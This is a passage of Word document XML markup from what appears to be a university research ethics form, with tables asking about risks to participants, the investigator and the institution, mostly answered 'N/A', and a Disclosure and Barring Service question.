          <w:p w14:paraId="1B93B9FF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00000000" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="-389729326"/>
                <w14:checkbox>
                  <w14:checked w14:val="1"/>
                  <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                  <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
                </w14:checkbox>
              </w:sdtPr>
              <w:sdtContent/>
            </w:sdt>
            <w:bookmarkEnd w:id="526"/>
            <w:bookmarkEnd w:id="527"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="05439DB2" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="49E8C12E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0147DB7B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Risks to participants</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CBBA206" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>For example: emotional distress, financial disclosure, physical harm, transfer of personal data, sensitive organisational information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="1287418C" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0E05689E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4991" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="008B3CA9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Risk to Participant:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78A2C8E7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="180237E3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4932" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2826C91F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>How will you mitigate the Risk to Participant</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72FE72F0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="268C68BC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="739ABE66" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="789602C8" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="69EA6050" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5F7DCFB4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">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E42F41">
              <w:rPr>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E42F41" w:rsidRPr="00E42F41" w14:paraId="618D07ED" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DF59D0E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4296F93A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34E4096D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B4A6EE5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="6B70AF88" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7A760CE6" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1DD9D2C9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Risks to investigator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48782CFB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>For example: personal safety, physical harm, emotional distress, risk of accusation of harm/impropriety, conflict of interest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4562695B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="208427E1" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D0AEEB0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4991" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0773C090" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Risk to Investigator:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EAF19FE" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E8522A1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4932" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="748E4FFB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>How will you mitigate the Risk to Investigator:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="129F33B1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="008EC92C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00C8557C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="46ADB7AB" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="08FA99B3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="10E720A4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>University/institutional risks</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDBDCAE" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>For example: adverse publicity, financial loss, data protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="59187722" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="116C0303" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4991" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77BC4AD3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Risk to University:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D8F7E76" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54F32771" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>None</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F3D0B32" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4932" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33E33B48" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>How will you mitigate the Risk to University:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6602E3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="77898E1C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731DCB98" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="6526BC3C" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1A9F495E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9923" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6BCE51D8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Disclosure and Barring Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="6E46866D" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1A1031E0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7401" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7A561D50" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">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vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="54AF7614" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A51CC62" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5F1AB3C0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6EB906" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="18BCE0B7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2105958A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="71A3A8B9" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="492"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="596" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="22A005C0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
